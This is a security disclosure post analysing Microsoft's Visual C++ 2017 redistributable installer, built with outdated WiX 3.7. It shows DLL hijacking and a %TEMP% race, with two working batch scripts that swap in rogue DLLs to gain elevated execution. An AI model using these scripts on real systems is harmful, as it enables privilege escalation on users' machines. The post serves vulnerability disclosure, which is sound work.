Hi @ll, about 6 weeks ago, Microsoft updated their MSKB article <https://support.microsoft.com/en-us/help/2977003/the-latest-supported-visual-c-downloads>, listing the current/lastest downloads of their MSVCRT alias Microsoft Visual C++ Redistributable for Visual Studio 201x Guess what Microsoft used to build the executable installers offered on that page: COMPLETELY outdated versions 3.7.3813.0 (and before) of Wix Toolset, which NOBODY with a sane mind should but use any more due to their vulnerabilities (some of which are fixed in later/current versions)! <https://www.firegiant.com/blog/2016/1/20/wix-v3.10.2-released/> gives enough reason to drop these OUTDATED versions! Everybody interested in the dirty details should take a look at the executable installer offered via the first direct download link <https://aka.ms/vs/15/release/vc_redist.x86.exe> Take 1: ~~~~~~~ | C:\Users\Stefan\Downloads>CURL.exe -q -I -L https://aka.ms/vs/15/release/vc_redist.x86.exe ... | Last-Modified: Tue, 22 May 2018 17:35:06 GMT The installer is quite new, published about 10 weeks ago. Take 2: ~~~~~~~ | C:\Users\Stefan\Downloads>SIGNTOOL.exe Verify /V vc_redist.x86.exe ... | The signature is timestamped: Tue May 15 08:08:31 2018 The installer was built or digitally signed about 11 weeks ago, just one week prior to its release. Take 3: ~~~~~~~ | C:\Users\Stefan\Downloads>FILEVER.exe /V vc_redist.x86.exe | --a-- W32i APP ENU 14.14.26429.4 shp 14,611,496 05-22-2018 vc_redist.x86.exe | | Language 0x0409 (Englisch (USA)) | CharSet 0x04e4 Windows, Multilingual | OleSelfRegister Disabled | CompanyName Microsoft Corporation | FileDescription Microsoft Visual C++ 2017 Redistributable (x86) - 14.14.26429 | InternalName setup | OriginalFilenam VC_redist.x86.exe | ProductName Microsoft Visual C++ 2017 Redistributable (x86) - 14.14.26429 | ProductVersion 14.14.26429.4 | FileVersion 14.14.26429 | LegalCopyright Copyright (c) Microsoft Corporation. All rights reserved. Take 4: ~~~~~~~ | C:\Users\Stefan\Downloads>LINK.exe /DUMP /HEADERS /DEPENDENTS vc_redist.x86.exe ... | FILE HEADER VALUES | 14C machine (x86) | 7 number of sections | 54DE53A8 time date stamp Fri Feb 13 20:42:32 2015 ~~~~~~~~~~~~~~~~~~~~~~~~ WTF? The executable was built about 3.5 YEARS ago! JFTR: the build date of the executable matches that of the release of Wix Toolset 3.7 (see below). Microsoft builds their CURRENT executable installers from outdated CRAP and dares to ship them to hundreds of millions of customers, where their well-known vulnerabilities can be exploited! Microsoft's mantra "Keep your PC up-to-date", which they tell all their customers/users over and over again, is obviously unheard in Redmond, especially not followed on Microsoft's production systems! Take 4, continued: ~~~~~~~~~~~~~~~~~~ | OPTIONAL HEADER VALUES | 10B magic # (PE32) | 10.00 linker version ~~~~~ ... | 5.01 operating system version | 0.00 image version | 5.01 subsystem version ~~~~ The executable installer was built with Visual Studio 2010, for use on Windows XP and newer versions of Windows NT. If only someone had told Redmond's tinkerers that Windows XP went out of support in April 2014... JFTR: April 14, 2014 happened to be 10 months before February 13, 2015! Take 4, continued: ~~~~~~~~~~~~~~~~~~ | Image has the following dependencies: | | gdiplus.dll | ADVAPI32.dll | USER32.dll | OLEAUT32.dll | GDI32.dll | SHELL32.dll | ole32.dll | KERNEL32.dll | Cabinet.dll | CRYPT32.dll | msi.dll | RPCRT4.dll | WININET.dll | WINTRUST.dll | VERSION.dll Each of these DLLs not treated as "known DLL" on the version of Windows this executable installer will run on will be loaded from the programs "application directory" and their entry point routine called BEFORE the program's entry point routine, allowing to compromise the installation COMPLETELY! Take 4, continued: ~~~~~~~~~~~~~~~~~~ | Debug Directories | | Time Type Size RVA Pointer | -------- ------ -------- -------- -------- | 54DE53A8 cv 46 00052F60 51760 ... E:\delivery\Dev\wix37\build\ship\x86\burn.pdb ~~~~~ This gives the main version of the Wix Toolset used to build the vulnerable executable installer: 3.7 Take 5: ~~~~~~~ Using this information we can determine the full version: | C:\Users\Stefan\Downloads>FIND.exe "3.7" vc_redist.x86.exe | 3.7.3813.0 ... Did I already tell that this version is COMPLETELY outdated, creates VULNERABLE installers, and SHOULD NOT be used any more? <https://www.firegiant.com/blog/2016/1/20/wix-v3.10.2-released/> Take 6: ~~~~~~~ The embedded "application manifest" can also be found and printed: | C:\Users\Stefan\Downloads>FIND.exe "WiX" vc_redist.x86.exe ... | <description>WiX Toolset Bootstrapper</description> ... | <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel> ~~~~~~~~~ The executable will be run with the credentials of its caller. This but means that all files extracted/copied to %TEMP% and below (or any other subdirectory) are UNPROTECTED, every process running under the same user account can tamper with these files! Take 7: ~~~~~~~ | C:\Users\Stefan\Downloads>vc_redist.x86.exe Running on a fully patched Windows 7 SP1, the program loads at least the following DLLs from its "application directory", executing their entry point routine with the credentials of the caller: UXTheme.dll, Cabinet.dll, MSI.dll, Version.dll, WindowsCodecs.dll, MSLS31.dll, PropSys.dll, NTMARTA.dll, CryptSP.dll, RPCRtRemote.dll, Secur32.dll, MPR.dll For this well-known and well-documented vulnerability see <https://cwe.mitre.org/data/definitions/426.html> and <https://cwe.mitre.org/data/definitions/427.html> plus <https://capec.mitre.org/data/definitions/471.html>. See <https://skanthak.homepage.t-online.de/minesweeper.html> for the instructions to build these DLLs. For the following takes, I assume that these DLLs have been placed into the user's "Downloads" directory. Take 7, continued: ~~~~~~~~~~~~~~~~~~ Running with the callers credentials, the program creates a subdirectory {2019b6a0-8533-4a04-ac0e-b2c10bdb9841} (notice the HARD-CODED name) in the user's %TEMP% directory: this subdirectory inherits the NTFS ACL from its parent %TEMP%, allowing full access for the current/owning user. Under this subdirectory it creates several more subdirectories and extracts multiple files, especially wixstdba.dll, which it loads afterwards, and a copy of itself, which it executes afterwards, ELEVATED: %TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.ba1\wixstdba.dll %TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be\vc_redist.x86.exe For this well-known and well-documented vulnerability see <https://cwe.mitre.org/data/definitions/377.html> and <https://cwe.mitre.org/data/definitions/379.html> plus <https://capec.mitre.org/data/definitions/29.html> Take 7, continued: ~~~~~~~~~~~~~~~~~~ Due to the inherited full access any process running in the same user account can tamper with these unprotected files between their creation and use, for example with the following batch scripts: --- wixstdba.cmd --- :wixstdba @If Not Exist "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.ba1\1028" Goto :wixstdba Copy "%USERPROFILE%\Downloads\dlldummy.dll" "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.ba1\wixstdba.dll" --- eof --- --- wixstdbe.cmd --- :wixstdbe @If Not Exist "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be" Goto :wixstdbe For %%! In (Version MSI Cabinet UXTheme WindowsCodecs MSLS31 PropSys NTMARTA CryptSP RPCRtRemote Secur32 MPR) Do Copy "%USERPROFILE%\Downloads\%%!.dll" "%TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be" --- eof --- Take 8: ~~~~~~~ Running ELEVATED, the program's copy %TEMP%\{2019b6a0-8533-4a04-ac0e-b2c10bdb9841}\.be\vc_redist.x86.exe loads the rogue DLLs copied by the second batch script, executing their entry point routines with ELEVATED rights: GAME OVER! Mitigation: ~~~~~~~~~~~ * DONT use executable installers! * NEVER run executable installers in unsafe environments! Fix: ~~~~ * DUMP executable installers, use *.MSI or *.INF plus *.CAB! stay tuned Stefan Kanthak